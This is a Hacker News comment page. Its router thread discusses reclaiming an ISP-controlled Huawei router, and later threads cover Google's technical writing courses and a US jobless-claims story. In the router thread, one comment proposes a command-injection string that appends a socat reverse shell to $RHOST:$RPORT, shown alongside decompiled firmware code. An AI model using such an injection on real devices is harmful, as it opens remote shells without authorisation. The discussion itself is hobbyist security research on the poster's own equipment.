That was the worst part. I would have that bombshell as the lede. And then delete it if possible.

j_h(10000) 2 days ago [-]

EU net neutrality regulation grants end users right to use their own equipment.

https://fsfe.org/activities/routers/

Someone1234(4336) 2 days ago [-]

Turkey isn't in the EU.

mercora(4290) 2 days ago [-]

note there is only Germany, Italy and the Netherlands with this regulation enforced. they even link to a [0]page with progress of that campaign.

[0] https://wiki.fsfe.org/Activities/CompulsoryRouters/#Router_F...

non-entity(3552) 2 days ago [-]

A while back, I was playing around with the cable modem / router the ISP gave me because I was curious and an idiot. After screwing around a bit, I managed to find a vulnerability that exposed technician credentials plaintext and they actually worked. Had no idea where to report it though, because the manufacturers contact page could be summed up as fuck you we don't talk directly to consumers. I dont think the vulnerability was that bad, as you had to be logged in to the web interface already with another account, but still.

I don't really trust ISP provided hardware / software now though.

Bartweiss(10000) 2 days ago [-]

> you had to be logged in to the web interface already with another account

Obviously I don't know specifics, but if this applies to any router which has multiple tiers of login then it could be a pretty serious problem. I suspect that might be true for routers designed specifically broadcast multiple networks (e.g. school or shared apartment-building routers)?

praptak(2737) 2 days ago [-]

The right thing to do in such circumstances is to publish the vulnerability.

steerablesafe(10000) 2 days ago [-]

You never know. The same technician credentials could potentially work on many routers from the same ISP, maybe even through WAN.

mercora(4290) 2 days ago [-]

it looks like this CLI has some hardcoded shell commands with variable substitutions that look possibly unprotected against command injection.

For example

  iptables %s > %s 2>&1
could probably be executed as

  iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane > /var/IptablesInfo 2>&1
by issuing

  iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
and therefore it might be possible to get real shell access too.
paddlesteamer(10000) 1 day ago [-]

Hello, OP here, I've actually spent considerable amount time to find a code execution. I know you'll want to learn details of FUN_004122c0 but here is the decompiled version of iptables part from ghidra:

undefined4 FUN_004045a0(int param_1,int param_2)

{ int iVar1; int iVar2; char pcVar3; char cVar4; code pcVar5; undefined auStack544 [256]; undefined auStack288 [260];

  FUN_00412530(auStack544,0,0x100);
  FUN_00412530(auStack288,0,0x100);
  if (param_1 == 0) {
    FUN_004122c0(auStack288,0x100,'iptables > %s 2>&1','/var/IptablesInfo');
  }
  else {
    iVar1 = FUN_00412210(0x100);
    if (iVar1 == 0) {
      return 0x40010009;
    }
    cVar4 = '\0';
    while ((iVar2 = *param_2, iVar2 != 0 && (cVar4 != '\x10'))) {
      if (cVar4 == '\0') {
        FUN_004122c0(iVar1,0x100,0x412c84,iVar2);
      }
      else {
        FUN_004122c0(iVar1,0x100,'%s %s',iVar1,iVar2);
      }
      cVar4 = cVar4 + '\x01';
      param_2 = param_2 + 1;
    }
    FUN_004122c0(auStack288,0x100,'iptables %s > %s 2>&1',iVar1,'/var/IptablesInfo');
    FUN_00412660(iVar1);
  }
  FUN_00412330(auStack288);
  iVar1 = FUN_004123c0('/var/IptablesInfo',0x414f68);
  if (iVar1 == 0) {
    pcVar5 = FUN_004126e0;
    pcVar3 = 'Fail\r';
  }
  else {
    while (iVar2 = FUN_00412470(auStack544,0x100,iVar1), iVar2 != 0) {
      FUN_004126b0(0x412c84,auStack544);
      FUN_004121a0(0xd);
    }
    FUN_00412520(DAT_0042b010);
    FUN_004123a0(iVar1);
    pcVar5 = FUN_00412500;
    pcVar3 = '/var/IptablesInfo';
  }
  (*pcVar5)(pcVar3);
  return 0;
}

Any ideas?

Faaak(10000) 2 days ago [-]

Depends if they `execve` or run the command inside a shell.

I'd bet for (1), but who knows.

blakesterz(4311) 2 days ago [-]

Interesting read! There's actually 3 parts to this:

Part 2: https://0x90.psaux.io/2020/03/19/Taking-Back-What-Is-Already...

And 3: https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-Already...

Summary from the end of Part 3:

'So we managed to change passwords for both ssh and telnet, gain access to Root user for the web interface, changed that password too. We changed ACS URL to ours and remove the IP restrictions. To put it simply, we cleaned up our router from our ISP. Good for our privacy.'

sheep-a(10000) 2 days ago [-]

You forgot this bit of the summary, which I think is more interesting!

'Still there is an authorized ssh key left in the firmware but for now it's enough that we're keeping the ISP out. Maybe in the future, we can repack the firmware with our configuration and keys and install it on the router. For now, take care!'

fireattack(10000) 1 day ago [-]

The navigation arrows on top right corner seem to be backward. 'Next' goes from 2 to 1, instead of 3.

fulafel(3340) 2 days ago [-]

Trivia: Strictly speaking a box that does NAT is not a router in the IP protocol sense, it's a kind of proxy. The router requirements RFC explicitly forbids altering most fields (incl the address field) in the IP header.

icedchai(4288) 2 days ago [-]

...an RFC that was written in 1995, before NAT was really necessary.

My view: If it forwards IP between different networks, it's a router.

packet_nerd(10000) 2 days ago [-]

The box in people's home's colloquially known as a router actually commonly combines a lot of functions into one:

* router

* firewall

* NAT device

* modem

* switch

* access point

* DNS resolver

* DHCP server

And probably others I'm not thinking of :-)

iso1631(10000) 2 days ago [-]

I have a box that runs various routing protocols including OSPF and BGP, but also does nat where it needs to. It's known as a 'router'

c0nsumer(4116) 2 days ago [-]

Very true. Yet at the same time, it does route traffic to the appropriate boxes. And the name 'router', when referring to something someone has at their house, has entered the vernacular to mean 'the box at home which lets me share the internet connection across all my computers'.

Most folks have no idea how it works behind the scenes, which typically is a combination of NAT (IPv4), routing (IPv6), DHCP, DNS, UPnP, and more. So, it's just 'the router'.

zamadatix(10000) 2 days ago [-]

The NAT RFCs came after the routing RFC and refer to NAT as a router function not as an orthogonal function, boxes that do NAT are referred to as routers in the RFC. This is reflected in the real world where NAT is implemented as part of the routing chain not as a separate module. Remember NAT isn't a box creating 2 sockets and ferrying data between them it is just the translation of fields on top of normal routing functionality.

gerdesj(10000) 2 days ago [-]

RFC 1918 does allow that the internet was changing rather fast back in 1995 and accepts it probably wont be the final word: https://tools.ietf.org/html/rfc1812#section-1.3.1

tssva(10000) 2 days ago [-]

Trivia: Strictly speaking a box that does NAT is not a kind of proxy. Proxies act as the destination end point of one connection, establish a separate connection to another endpoint and forward data between the two separate connections. A NAT device changes IP header information such as the address field and if also doing PAT the port field but doesn't act as the source or destination for connections.

mafuy(10000) 2 days ago [-]

Many people here pointed out a problem: Removing access for the ISP and/or device manufacturer means they cannot fix bugs remotely and automatically. This is bad in situations like when the Mirai malware hit.

How about this?: 'You can use your own device and we provide all required information, but there will be no advanced support and you have to check for bugfixes yourself monthly.'

... now that I wrote it, I see the answer: There is no way to enforce this, especially not reliably.

marcosdumay(10000) 2 days ago [-]

Ok, from the Wikipedia:

> Mirai then identifies vulnerable IoT devices using a table of more than 60 common factory default usernames and passwords

Taking control of the device is exactly the kind of thing that stops that attack.

davedx(1829) 2 days ago [-]

Fantastic write up from a hacking point of view. I did wonder about this statement though:

'This is very invasive and unacceptable. It may seem necessary to apply security patches published by your ISP but the user should be able to disable it whenever she wants.'

Legally, at least in countries where I've lived, the ISP still owns the router. This surprised me a bit when I first found out, but then I got used to the idea, but you should treat any ISP or telecom gear in your house as something that's 'rented but still owned and controlled by someone else'.

yjftsjthsd-h(10000) 2 days ago [-]

And that is why I have my own router plugged into the ISP router:)

blacksmith_tb(10000) 2 days ago [-]

True, but I think it's worth comparing it to other utilities in your home - what if your electric company could make all your lightbulbs 20% dimmer without notice? Or if your water heater was remotely administered? ISPs, like mobile telcos, like to claim they must have control over your hardware 'for security' but I think the most charitable interpretation is that it's to make their customer service dept. sweat less (more nefarious possibilities exist, of course).

AdmiralAsshat(1444) 2 days ago [-]

I never thought to nmap my own router until reading this.

  PORT      STATE SERVICE
  53/tcp    open  domain
  80/tcp    open  http
  631/tcp   open  ipp
  5000/tcp  open  upnp
  7777/tcp  open  cbt
  20005/tcp open  btx
Now begins the three-hours-and-counting rabbit hole of trying to figure out what the hell is running on ports 7777 and 20005. Or why UPNP is apparently running, despite UPNP being explicitly disabled on the Netgear router's admin page.
manifoldgeo(10000) 1 day ago [-]

Maybe it's a remote administration port for your ISP. I have a router provided by Froniter, formerly Verizon FiOS, where port 4567 is always open and cannot be closed with a firewall rule from the router's web UI (grayed out). After some googling I found out that it's their maintenance port: https://www.speedguide.net/port.php?port=4567

For a while I had my own OpenWRT router in place of the ISP one, but I think they got wise to it and blocked the MAC. I changed it to match the ISP router's MAC address, but it only worked for about 3 minutes before being blocked again.

jason0597(4169) 2 days ago [-]

It's funny to think that if you were to report all of your findings to your local newspaper (Turkish newspaper in this case), as to how Turkish ISPs have complete access to your router or how Huawei (China) has an SSH key for your router, people would go absolutely ballistic. But for us it's just another day of expected craziness and we're tired of talking about it

kuesji(10000) 2 days ago [-]

i don't think too many people care about this. ( yes, i live in turkey )

Someone1234(4336) 2 days ago [-]

> how Turkish ISPs have complete access to your router

You think it is going to blow people's socks off that a router provided and controlled by an ISP is accessible by that same ISP? Huh?

The Huawei SSH key is a little strange, but depressingly common for network equipment, even big names like Cisco[0].

[0] https://tools.cisco.com/security/center/content/CiscoSecurit...

p1esk(2616) 2 days ago [-]

Yeah, no one cares outside of hackernews.

Thaxll(10000) 2 days ago [-]

If that stuff listen to the interface of your public IP which is most likely not the case, but yes it's still scary.

closeparen(4235) 2 days ago [-]

CPE is just part of the ISP's infrastructure that happens to be in your house. There is no need to trust it. Just put your own router in front of it.

TheSpiceIsLife(4188) 2 days ago [-]

> if you were to report all of your findings to your local newspaper ... people would go absolutely ballistic.

You reckon? I don't think they'd even be interested in hearing about it.

Where do you live and who is your local paper that leads you to believe they'd bother writing, let alone publishing, such a story?

kspacewalk2(10000) 2 days ago [-]

Turkish newspapers are almost universally subservient to the autocratic government. Any free press that's still somehow around has way more consequential dictatorial abuses of power to report on, if they dare.

0xff00ffee(4313) 1 day ago [-]

I'm pretty sure my new CenturyLInk fiber router is similar. I tried to create a PPoE connection from my WRT1900 direclty to century link using the same credentials and I couldn't connect to my internet. However, now I am motivated to create a bridge and find out why.

For CenturyLink fiber I have two boxes:

Box A: the exterior fiber enters this box, the tech said it was a 'translator'; and the port 4 ethernet on it goes to ...

Box B: the centurylink wireless router, which performs the PPoE with my credentials which were somehow hardwired because no one ever told me my username/password. I'm guesing TR-069? Then port 4 on this goes to ...

Box C: MY WRT1900AC, which then goes to other subnets for my cameras, lab, and office.

I figured Box B was redundant, but trying to remove it has been problematic.

0xff00ffee(4313) 1 day ago [-]

Why did port 8015 show up on the remote system after resetting firmware? Shouldn't nmap have reported that?

usmannk(10000) 1 day ago [-]

It was a "fast nmap", so only the top 100 most common ports were checked.

zeroflow(10000) 2 days ago [-]

...and that's why my ISPs router is running in modem mode with a non-ISP-controlled router from Ubiquiti behind it - which I may replace with a pfSense box in the future.

I'm pretty happy that my cable ISP is allowing this mode so I don't have to double-NAT in my setup.

matheusmoreira(10000) 2 days ago [-]

You're lucky your ISP's router offers you that option. My ISP's VDSL2 router would require 'unlocking' in order to get bridge mode and it can't be easily replaced.

pwg(302) 2 days ago [-]

This is why, in my case, the ISP's router (that awful box Verizon provides with FIOS) is sitting, beside the DMARC, unplugged and powered off.

My DMARC has a hot ethernet jack, and my firewall (PC running Linux) that I control is connected to that ethernet jack. No ISP shenanigans (other than what they can remotely do to configure the FIOS DMARC itself).

awelkie(4267) 2 days ago [-]

If your ISP didn't have that feature, could you just replace the cable modem too? My ISP's router is running EuroDOCSIS 3.0 and I'm wondering if I could replace the router with a modem + router of my own.

skoskie(10000) 2 days ago [-]

I have been so disappointed with my ubiquiti hardware. That UI is gorgeous, but lacks some real functionality that I need. I can't block BitTorrent (see forums). And I can't see a detailed traffic log; only the categories. Plus, those pretty graphs that tell you how much data you've used doesn't give a time frame. I have no idea if it's a week or a month.

I think pfSense will be my next too.

bonestamp2(10000) 2 days ago [-]

I recently upgraded my internet speed and my pfSense box was limiting my top download speed. So, I just went from pfSense to a Ubiquiti Secure Gateway. There are pros and cons of each, but I couldn't find any trustworthy pfSense hardware with the performance of a USG for anywhere near the same price. I do miss the configurability of pfSense though so I might switch back some day. That said, the ubiquiti interface and provisioning model is really slick.

chrisweekly(4088) 2 days ago [-]

I'd be grateful for guidance eg a link to a writeup of recommended hardware and config for a reasonably technical audience, eg 'Given a Verizon FIOS G1100, put it in bridge mode and connect hw that supports software X'...

miki123211(3959) 2 days ago [-]

Apparently a polish carrier called Multimedia has recently introduced a new, revolutionary service for some customers. It's called 'set up a custom wi-fi configuration', and it's just 5 pln (a little over $1)! It lets you think up of a ssid and password, and configure your router to use those! That's an amazing invention, isn't it? /s

Some customers apparently have absolutely no access to their routers, not even to the web interface, and they can't use their own either. All reconfiguration must be done through the customer service portal or by phone. That means the carrier can change for every little thing, including changing the Wi-Fi config! I'm not sure if you can even bridge, but I guess not. Note that this does not affect all customers of that carrier, just a minority.

gbrown(10000) 2 days ago [-]

Couldn't you just daisy chain a second router via Ethernet and use it? Bonus points for VPN-ing all of your traffic.

jscholes(2970) 2 days ago [-]

Enjoyed this write-up, but most of the exploration seemed to be facilitated by someone having already leaked the CLI root password online. Anyone have suggestions on how you might otherwise obtain that information?

paddlesteamer(10000) 1 day ago [-]

Hi, OP here, actually it's not true. Think the scenario as this: you don't have the CLI root password, you just do a MitM attack and learn about root password when your ISP attempts to change it. This applies my situation, also I could learn about the default password just by looking into the firmware.

LeonM(4231) 2 days ago [-]

In the Netherlands we now have a law where ISPs must allow your own choice of network equipment. This means they must give you the required information on how to connect your own device with their network.

I have a fiber connection, which I connected directly to a Ubiquity router through a suitable SFP module. My ISP supplied the information on the fiber type and which VLAN ID's to setup for internet, TV and telephony.

This way I have my own equipment, that I control myself. The 'modem' [0] which my ISP supplied is still in its original, unopened box.

lima(4184) 2 days ago [-]

Same in Germany! ISPs hate it because it it makes their lives a lot harder - in cable networks, they now have to deal with a zoo of endpoints on a shared medium vs. a small set of standardized devices.

As a customer, I like it.

hiram112(4342) 2 days ago [-]

What's you cost and speed of the fiber?

Also, if you didn't need so much bandwidth, is it possible to just order a basic 100Mb/10mb connection for a nominal fee of, say, 30Euro?

The speeds in the US aren't actually that bad, but you're basically forced to pay for everything: paid cable TV, equipment rental fees, etc, and your $40 plan ends up creeping towards $100 / month after the fees and taxes, with increases every year.

msla(4288) 2 days ago [-]

I have Spectrum cable Internet. I use their modem, but I supply my own router, and they've never given me any trouble. In fact, they recently upgraded my modem (from a Scientific Atlanta 2203C to a Ubee E31U2V1) and they didn't send me a router. The Ubee E31U2V1, like the Scientific Atlanta 2203C before it, only has one Ethernet port, and their official guide to getting the new modem working involved rebooting an external router, so there's no possible way they have a problem with customer-owned routers.

Which works out great for me. I can use OpenWRT with no hassle.

More to the point, I see the cable stuff as 'ISP land' in that it's directly interfacing with their internal hardware, and so has to dance to their tune very directly, whereas Ethernet and TCP/IP are common, and so will obey my rules in my home. I don't expect my modem to perform adblocking, which is why my router does it, and I'm not going to be stupid and try to 'uncap' my modem to get more speed, so I don't see a point to being able to provide my own cable modem. As long as I can own the router which provides the only path in and out of my LAN, I can do everything I'm capable of doing anyway, as far as I can see.

markus92(10000) 2 days ago [-]

It's been more common for DSL too, but I haven't heard of anyone using their own DOCSIS modem for Ziggo though. Have you?

r1ch(4022) 2 days ago [-]

Do you know if this applies to cable modems too? Are they required to allow a 3rd party modem that they normally wouldn't provide to customers?

avip(4206) 1 day ago [-]

This law is a tech-support nightmare.

You can call your ISP with any arbitrary piece of non-branded random AliExpress $#@$ of a network eq. and they must walk you through configuring it? That does not make much sense to me.

grawlinson(10000) 1 day ago [-]

It's the same in New Zealand, my particular ISP offers IPoE[0]. I have a repurposed PowerEdge R210II connected as a firewall/router.

[0]:https://en.wikipedia.org/wiki/IPoE

hedora(3864) 2 days ago [-]

The US has (had?) some network neutrality rules around discriminating against different types of hardware, but AT&T just does it anyway. (They require you to use their DSL modem + router + wifi and it has broken support for adding a second router behind it.)

thinkloop(3678) 2 days ago [-]

How can you do without the modem? Which ubiquity product is that?

cameronh90(10000) 2 days ago [-]

As far as I'm aware, UK doesn't have a law like this, but I've never had a situation where an ISP cared, they just tell you that if you have problems they might not be able to help. I think you get interop issues with TV and landline with those ISPs where everything is bundled into one fibre, but the internet bit usually works fine.

jedimastert(4221) 1 day ago [-]

I don't know if it's 'law' in America but I've never seen a major ISP give any more guff than sometimes making a technician come out to read the modem's MAC address. I've never had a ISP's router or modem on my networks

PascLeRasc(1537) 2 days ago [-]

Slightly off-topic: I'd really like to run screenfetch on my router (Asus RT-N66U), but it doesn't have enough free space to sftp the script to it [1]. Piping the script just freezes up. Does anyone know a good workaround? Has anyone ever tried this?

[1] https://unix.stackexchange.com/questions/510947/how-can-i-ru...

Topgamer7(4333) 2 days ago [-]

Check if your router has tmpfs mounted. Iirc thats ram, it should probably have enough space for you to upload it and run it from there.

skizm(10000) 1 day ago [-]

My ISP has a cloud access 'feature'. If I go to 192.168.1.1 it redirects me to their 'router.MYISP.net' site. What's the best way to go about disabling this? Should I just dump the rented router for my own?

simplyinfinity(4061) 1 day ago [-]

asus (and others) have the same feature. In my case it's a simple redirect from the ip of 192.168.1.1 to router.myasus.com which has a dns record of 192.168.1.1. so all it does is do a redirect to a domain.





Historical Discussions: Technical Writing Courses (March 22, 2020: 563 points)
Technical Writing Course by Google (February 28, 2020: 18 points)
Google's Technical Writing Courses for Engineers (February 27, 2020: 10 points)
Technical Writing Courses (March 03, 2020: 5 points)
Technical Writing Courses for Engineers (February 29, 2020: 2 points)
Technical Writing Courses for Engineers (February 29, 2020: 2 points)
Technical Writing Courses for Engineers (February 28, 2020: 2 points)
Technical Writing – Google Developers (March 04, 2020: 1 points)

(563) Technical Writing Courses

563 points 6 days ago by Lilian_Lee in 4189th position

developers.google.com | | comments | anchor

We've aimed these courses at people in the following roles:

  • professional software engineers
  • computer science students
  • engineering-adjacent roles, such as product managers

You need at least a little writing proficiency in English, but you don't need to be a strong writer to take these courses.

You will find these courses easier to understand if you have at least a little background in coding, though you don't need to be an expert coder.

These courses focus on technical writing, not on general English writing or business writing.




All Comments: [-] | anchor

breckenedge(10000) 6 days ago [-]

I graduated with a BA in English with a Technical Writing concentration 15 years ago. I did the job for a few years and, honestly, it sucked. At best, I was treated like an idiot by developers. Developer aloofness seemed much worse back then — they were never wrong. I was always at the end of the software development cycle, so there was never enough time budgeted to do good work. Management couldn't decide if I was a tester and a writer, so I often had to fill both roles. The rapid nature of software development today is great for users and developers, but lends itself to rapidly expiring documentation. I did the job long enough to teach myself software development. I switched over to being a software dev ten years ago and have never regretted it. Entry level pay as a software dev was better than experienced pay as a technical writer. I have been asked to write documentation, and I'm glad to do it — just not as my primary duty.

hinkley(4243) 6 days ago [-]

Twice I've seen a tech writer turn into de facto project manager because the real manager was asleep at the wheel.

Without real requirements how can anything ever be done? If nothing is done how do we get paid? If nothing is done and we have no money then what the fuck are you managing? Nearly every secretary or office assistant I've worked with has been more useful than the worst managers, and at less than half the salary. I have called this type of manager a glorified secretary before but that's disrespectful to secretaries.

hnarn(10000) 6 days ago [-]

Your comment makes me think that writing primary documentation should always be the job of developers, with time dedicated for the task, and technical writers can do the polishing and categorization that will likely be necessary for it to be published. Being the only one responsible for documentation while not being a developer must be a nightmare.

specialist(10000) 6 days ago [-]

TLDR: Redesign the product until its description makes sense.

I've done some technical writing. It's hard work. One open source tool I made, I spent more time on the docs than on the actual code.

Press releases, manuals, installation instructions, etc can be great QA/QC tools. If something is hard to communicate, then the subject itself is probably too complicated. Or just badly designed. Go back and simplify.

One stretch, I was also the engineering manager for a handful of products. So I had the juice to compel improvement.

The manuals and installation instructions were, um, challenging. I made the teams reengineer installers, UIs, workflows, whatever until the technical writing made sense. Other benefits included greatly reducing defects and technical support calls.

--

I also put the QA Test team members in charge of our releases. To great effect. Which I haven't seen any one else do before and since. But that's another story.

I only mention it to acknowledge that most orgs treat writers and testers like crap. Like you experienced. Which is unfortunate, wasteful, and rude.

daxfohl(4258) 6 days ago [-]

I'd love a technical PowerPoint course. I find writing to be pretty straightforward. But when manager is like 'can you create a couple slides about....' total deer in the headlights.

nogabebop23(10000) 6 days ago [-]

Myabe your anxiety is because you're focusing on the 'make some slides' vs. 'deliver content in a presentation format'. If you adhere to guidance for the later the slides are actually pretty easy. You quickly release they are just a prop that supplements the entire production.

I found the video 'How To Speak by Patrick Winston' delivered to new MIT students to be very helpful:

https://www.youtube.com/watch?v=Unzc731iCUY

Careful - once you become attuned to pp failures you will have little tolerance for them from both other people and yourself, and good presentations are a lot of work!

benjanik(10000) 6 days ago [-]

Do you find the problem to be more around design or story telling?

ct520(10000) 6 days ago [-]

I know right.. Any similar resources for this?

jedberg(2144) 6 days ago [-]

This book completely changed how I give presentations.

https://www.amazon.com/Presentation-Patterns-Techniques-Craf...

You can find it on the internet at various price points.

I even had a chance to give a technical presentation in front of the author and he said it was excellent, so apparently I internalized it's lessons.

enriquto(10000) 6 days ago [-]

> But when manager is like 'can you create a couple slides about....' total deer in the headlights.

I'm just like that. But I received wisdom from a friend that helped me a lot. The following 'three' rules:

RULE 1. No bullet lists

RULE 2. No bullet lists

RULE 3. At least one meaningful image per slide, covering more than 50% of its surface

Then, you explain your subject like you would to a friend in a bar, keeping the slides as useful side material.

oggy(4344) 6 days ago [-]

I've attended several short courses on giving presentations. This one by an ETH Zurich professor is the best one I know of:

https://inf.ethz.ch/personal/markusp/teaching/guides/guide-p...

He has a list of useful books at the end (I haven't read any of them, though)

ghaff(3612) 6 days ago [-]

Presentation Patterns, which a couple of people have mentioned, is probably more practical than most in terms of giving bite-sized advice though a lot of it is overkill (and not really even appropriate) for giving a manager a couple of slides about something.

The thing with most of the presentation books out there like Presentation Zen is that they're really oriented towards a good presenter up on a keynote stage at an event using slides as a supporting element of a well-rehearsed presentation.

That's not your typical presentation--and certainly not your typical internal monthly status meeting or project update.

Presentation Patterns also seems to do a better job than most at acknowledging the realities of material that's both presented and needs a leave behind. The 'standard' advice is that you should have two separate documents but that's really not practical in a lot of circumstances.

polcia(10000) 6 days ago [-]

What do you think, technical writing should be included in the daily job of engineers, or is it ok if the company is hiring people with some low technical skills/experience in favor of some target-language-Bachelor-of-Arts students to do these tasks?

xaedes(4019) 5 days ago [-]

I am very happy with (technical writing) experts helping with their expertise. That is how I want culture to see their role.

Maybe a bit over-simplified: SW-Devs talk to the machines, Doc-writers talk to the people. If you can't make the machines understand what you want it to do, you fail. If you can't make the people understand what to do with your precious developed system, you fail.

therealdrag0(10000) 6 days ago [-]

I think it is an area of work that (given a large enough company) benefits from having dedicated owners. Engineers have too many other things pulling at their strings, whether it's deadlines or just code they 'rather' be working on.

Some devs will take interest to documentation but most wont. Most seem to just do a single mind-dump and call it good, no better than the college essay they got a C on. There's also real value in having someone own the organization of the writing.

aliabd(3842) 6 days ago [-]

I've been working on this tool for a while that makes documentation easier and faster. The main idea is to have the code itself be the driver. Would love some feedback: https://trymaniac.com

Aliabid94(10000) 6 days ago [-]

This is something that I've felt is going to become very hot - some way of ensuring that documentation never goes stale. In the same vein as tests needing to pass before merging a commit, ensuring documentation is up to date when commiting. Looking forward to hearing more!

cmurf(1699) 6 days ago [-]

The staggered screenshots that are ostensibly examples are all blank?

Update: I see it works in Chrome but not in Firefox. Not sure why.

j88439h84(10000) 6 days ago [-]

Whoa.

j88439h84(10000) 6 days ago [-]

I want diagrams of my modules and how things are connected, such as one that shows 'types defined in foo.py are used in bar.py'. While you're generating docs from code, might think about diagrams.

boojing(10000) 6 days ago [-]

The content seems good but I'm not a fan of the way the sections are laid out on the introduction page. The courses should at the very least have hyperlinks for each of the learning objectives.

mattlutze(4312) 6 days ago [-]

There's a lesson overview on the left-side navigation, and an inner-lesson table of contents on the right-side navigation, which links to each topic or learning objective.

If you're on a narrow format it looks like that table of contents is set into the top of the article below the lesson title.

205guy(4284) 6 days ago [-]

I found that turning my tablet sideways revealed a sidebar with links to each section of the courses. Sometimes responsive UI is not better.

yihsiu(10000) 6 days ago [-]

I actually prefer the way it is. When there are too many links around, I tend to do some DFS-like reading and it ends up anxiety and tons of tabs. Things get worst when there're loops.

205guy(4284) 6 days ago [-]

This is why "nobody reads documentation." These courses are typical tech-writer overkill, missing the forest for the trees, then getting lost in the weeds (if I may mix a few metaphors). There is too much introduction and setup, then it jumps into the nitty-gritty, but never gives the big picture.

Assuming this was written by the Google tech writers, I'm surprised at how middle-of-the-road the offering is. I kinda assumed they had an academic-like cutting-edge writing department.

To write documentation, you need 2 things: an understanding of the subject matter, and a high-level understanding of what the readers want to do. The reader doesn't want to use your API to list resources, the reader wants to give his/her users a list of resources for further operations. So you don't give a trivial example of getting the list of providers, you give an example of how to display providers by getting the list and processing the various useful fields.

It also helps if the API or UI or whatever is logical and consistent to begin with.

watwut(10000) 6 days ago [-]

To me as someone often reads documentation, the lack things outlined in that course make it harder. Not defining terms before using is something I sweared about a lot. Documentations with long complicated sentences are hard to follow.

I read the course, there were three clicks setup and then I was choosing topics to read about. I did not get lost and it was short. None of that seemed overkill to me.

chiefalchemist(4168) 6 days ago [-]

Perhaps their newer products have gotten better but I've traditionally found Google's documentation to be case studies in how _not_ to write docs. Typically, they seem to be writen for ppl who understand the product and/or situation. You know, the type of ppl who don't need the docs.

I'm going to check this out. But looking to Google for advice on docs is like looking to Google for advice on design and/or UX. You don't bother. There are higher quality sources of such info.

federicoponzi(746) 6 days ago [-]

Really interesting comment thanks! Do you have any more tips for improving in technical writing? Do you know of any other good book / course on this matter?

chiefalchemist(4168) 6 days ago [-]

> To write documentation, you need 2 things: an understanding of the subject matter, and a high-level understanding of what the readers want to do.

Yes. But this list is incomplete. In fact, it's missing the two essential questions the go into _any_ communication:

1) Who is the audience?

2) What do / don't they already know?

How you explain what they want to do is a direct funtion of you they are and their current knowledge toolbox (if you will).

The vast majority of tech docs suck because too often the sender assumes the receiver is just like them. That is, the sender fails to put themselves aside; fails to put themselves in the shoes of the receiver.

oggy(4344) 6 days ago [-]

Great comment about missing the forest from the trees. The course outline reminds me of an article on 'writing great code' that lists the rules of a code formatter.

My personal tips for writing docs: 1. think about what you need to get across and to whom. I've found this categorization helpful (just don't get religious about it): https://www.writethedocs.org/videos/eu/2017/the-four-kinds-o... 2. try to say whatever you're saying with as few words as possible. 'Vigorous writing is concise' is probably the best takeaway I got from Strunk & White (not a huge fan of the book otherwise) 3. do a few passes. 'Keep rewriting' is probably the best takeaway I got from 'On Writing Well' (but I like that book in general).

open-source-ux(395) 6 days ago [-]

I like these 10 tips for clear writing from the GOV.UK team. The tips can be used by anyone to help their writing and are not specific to technical writing.

(To skip the podcast, scroll down the page to see the list of 10 tips)

https://gds.blog.gov.uk/2019/08/27/podcast-on-writing/

The 'Writing for GOV.UK' guide is also full of good writing advice for people publishing content on the web:

https://www.gov.uk/guidance/content-design/writing-for-gov-u...

Metus(10000) 6 days ago [-]

Related are the atrocious user manuals and tutorials for various consumer electronics products. You get descriptions like 'if the self-diagnostic tool shows the message 'no errors found', it means that there are no errors that the self-diagnostic can see.' Or other manuals or help texts that just plain rephrase the prompt.

Good technical writing is much like teaching a great course: Empowering the reader to use the product or service for their own purposes.

jseliger(16) 6 days ago [-]

These courses are typical tech-writer overkill, missing the forest for the trees, then getting lost in the weeds (if I may mix a few metaphors). There is too much introduction and setup, then it jumps into the nitty-gritty, but never gives the big picture.

The real challenge is that no one agrees what great writing really is or how to teach it. The problems are conceptual and related to the nature of writing, thinking, and communicating—all fields that are unsolved. I've taught writing in universities and written about the challenges of writing (and related grading challenges) before. https://jakeseliger.com/2014/12/20/subjectivity-in-writing-a...

'The big picture' is often the world itself.

mattlutze(4312) 6 days ago [-]

After reading some of the comments here, I'm wondering if people are actually following the link and reviewing the content.

The two courses are well-structured. Each course has an overall outline listing each lesson, and each lesson has a table of contents to overview the topics therein. The courses highlight major key topics in technical writing and does so with easy-to-internalize (tenets). I'd have loved for my university coursework to be so clearly organized.

Some highlights include defining your audience[1], engaging your audience[2] and reviewing how short and clear sentences improve comprehension[3].

1: https://developers.google.com/tech-writing/one/audience#defi...

2: https://developers.google.com/tech-writing/one/active-voice

3: https://developers.google.com/tech-writing/one/short-sentenc...

205guy(4284) 6 days ago [-]

Your reference 1 is a deep-link that skips the intro. The intro says:

> The course designers believe that you are probably comfortable with mathematics. Therefore, this unit begins with an equation:

> good documentation = knowledge and skills your audience needs to do a task − your audience's current knowledge and skills

> In other words, make sure your document provides the information your audience needs that your audience doesn't already have. Therefore, this unit explains how to do the following: ...

This is the kind of fluff that turns many people off. Worse, it is confusing and tries to make a formula out of a sentence. The whole thing could've been replaced with the first sentence of the 3rd paragraph I quoted.

Your reference 2 contains this gem:

> Short sentences communicate more powerfully than long sentences, and short sentences are usually easier to understand than long sentences.

And the section title immediately after that sentence is:

> Focus each sentence on a single idea

pdr2020(10000) 6 days ago [-]

tenets, not tenants.

Too(10000) 6 days ago [-]

Good resource. One common flaw i see in many technical writings, which i missed from the course, is treating the reader as a complete puppet. As in giving copy-paste instructions on what to do, but not explaining what's happening underneath.

Better to teach a man how to fish than giving away a fish, or better condensed by Fred Brooks famous quote from Mythical Man Month: Show me your flowcharts and conceal your tables, and I shall continue to be mystified. Show me your tables, and I won't usually need your flowcharts; they'll be obvious.

ghaff(3612) 6 days ago [-]

To be honest, that's a problem with a lot of in-person workshops and the like as well. There's a lot of type this, type that, run this script, etc. without enough context as to why you're doing these various steps.





Historical Discussions: 3.28M file for U.S. jobless benefits (March 26, 2020: 547 points)

(554) 3.28M file for U.S. jobless benefits

554 points 2 days ago by treyfitty in 4266th position

www.wsj.com | | comments | anchor

WASHINGTON—A record 3.28 million workers applied for unemployment benefits last week as the new coronavirus hit the U.S. economy, marking an abrupt end to the nation's historic, decadelong run of job growth.

The number of Americans filing for claims was nearly five times the previous record high. The surge was for the week ended March 21 and could rise further. Pennsylvania, Ohio and California were among 10 states reporting more than 100,000 claims, leaving unemployment systems overloaded.

...



All Comments: [-] | anchor

AtlasBarfed(10000) 1 day ago [-]

